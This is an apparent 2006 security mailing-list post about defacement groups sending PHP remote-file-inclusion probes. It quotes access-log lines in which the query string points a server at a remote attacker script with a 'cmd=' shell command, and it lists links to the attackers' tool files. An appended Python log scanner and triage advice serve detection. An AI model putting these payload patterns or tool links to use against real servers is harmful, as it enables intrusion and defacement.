
| Subject: | Defacing Groups using PHP Include Attacks as Vector |
|---|---|
| Date: | Sun, 8 Jan 2006 22:13:05 -0500 (EST) |
For the most part I ignore the dozens of daily attacks against my system, but this one caught my eye. Looks like some defacing groups are writing/implementing Perl scripts to identify query strings and attempt PHP inclusion attacks against them (not using known exploits). Below is a log snippet.

```
202.226.224.67 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:44 -0500] "GET /?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:45 -0500] "GET /webservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24083 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:46 -0500] "GET /phishing/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 30626 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:47 -0500] "GET /database/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24267 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:48 -0500] "GET /appservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24521 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:49 -0500] "GET //lib/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 47471 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:50 -0500] "GET /archive/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 25445 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:51 -0500] "GET /development/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24286 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:52 -0500] "GET /ws/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29316 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:53 -0500] "GET //pen-test/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29892 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:54 -0500] "GET /ajax/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 28338 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:55 -0500] "GET /appfirewall/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24073 "-" "lwp-trivial/1.35"
```

The script located at www.sanicentrum.be might interest some of you, as well as the include file it uses at http://www.sanicentrum.be/private/therules25.dot and the many scripts it uses/looks for.

Working referenced links:

* http://www.sanicentrum.be/private/tool25.dot
* http://www.sanicentrum.be/private/writer25.dot
* http://www.sanicentrum.be/private/get25.dot
* http://www.sanicentrum.be/private/filed25.dot
* http://www.sanicentrum.be/private/filed_put25.dot (of interest)
* http://www.sanicentrum.be/private/copyd25.dot
* http://www.sanicentrum.be/private/flist25.dot
* http://www.sanicentrum.be/private/style25.dot (because every defacement group needs HTML templating :)

Non-working (at this time):

* http://www.sanicentrum.be/private/safe25.dot

I've contacted SANS since the parent host *appears* to be hacked.

- Robert
http://www.cgisecurity.com/ Website Security News, and more!
http://www.cgisecurity.com/index.rss [RSS Feed]
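The pattern in the log above (a query parameter whose value is an absolute URL, plus a `cmd=` parameter for the included script to execute) is easy to pick out of an Apache access log mechanically. The following scanner is an added example written for this page; it is not the post author's code and has nothing to do with the Perl tool the post describes. The sample log lines are constructed to mirror the quoted ones (same source IP, paths, include URL and user agent) with one benign `?ref=newsletter` request and a TEST-NET address added as a negative case; the `COMMAND_PARAMS` list is an assumption about common parameter names, not something taken from the post.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache combined-format access logs.

Added example for this page, not code from the post's author or from the
scanner the post describes. SAMPLE_LOG is constructed to mirror the lines
quoted in the post plus one benign request; COMMAND_PARAMS is an assumption.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Apache "combined" format:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Schemes PHP's include() will fetch when allow_url_fopen/allow_url_include are on.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Parameter names commonly used to pass a shell command to the included script (assumption).
COMMAND_PARAMS = {"cmd", "command", "exec", "c"}

# Constructed sample: first four lines mirror the post, the last one is a benign control
# (192.0.2.10 is a documentation/TEST-NET address, not a real client).
SAMPLE_LOG = """\
202.226.224.67 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:44 -0500] "GET /?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:45 -0500] "GET /webservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24083 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:49 -0500] "GET //lib/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 47471 "-" "lwp-trivial/1.35"
192.0.2.10 - - [08/Jan/2006:21:40:01 -0500] "GET /?ref=newsletter HTTP/1.0" 200 37172 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = COMBINED.match(line.strip())
    return m.groupdict() if m else None


def scan(lines):
    """Return one finding per query parameter whose value is a remote URL.

    The request target is split on '?' by hand: urlsplit() would treat a
    leading '//lib/' as a host name and lose the path.
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, _, query = rec["target"].partition("?")
        params = parse_qsl(query, keep_blank_values=True)  # also percent-decodes values
        cmd = next((v for k, v in params if k.lower() in COMMAND_PARAMS), None)
        for name, value in params:
            if value.lower().startswith(REMOTE_SCHEMES):
                findings.append({
                    "src": rec["host"], "time": rec["time"], "path": path,
                    "param": name, "include_url": value, "cmd": cmd,
                    "status": rec["status"], "size": rec["size"], "ua": rec["ua"],
                })
    return findings


def summarize(findings):
    """Group findings by source IP: paths sprayed, include URLs and user agents seen.

    One source hitting many directories with the same include URL within a few
    seconds is the signature of a scripted scanner rather than a targeted exploit.
    """
    per_src = defaultdict(lambda: {"paths": [], "include_urls": set(), "user_agents": set()})
    for f in findings:
        s = per_src[f["src"]]
        if f["path"] not in s["paths"]:
            s["paths"].append(f["path"])
        s["include_urls"].add(f["include_url"])
        s["user_agents"].add(f["ua"])
    return dict(per_src)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.splitlines())
    for f in hits:
        print(f"{f['src']} {f['path']} {f['param']}={f['include_url']} cmd={f['cmd']!r} -> {f['status']} {f['size']}")
    for src, info in summarize(hits).items():
        print(src, len(info["paths"]), "paths probed via", sorted(info["include_urls"]))
```

Two things worth checking when triaging hits like these: the trailing `?` on the include URL is the usual trick for discarding whatever suffix (such as `.php`) a vulnerable script appends before calling `include()`, so its presence is a strong hint the request is an RFI probe rather than a stray referrer; and a 200 response does not mean the probe worked. In the quoted log the `/?ref=...` request returned exactly the same 37172 bytes as the plain `GET /`, which is what you expect when the page simply ignores the parameter. A response size that differs from the baseline, or outbound traffic from the web server to the include host, is the signal that deserves an incident response.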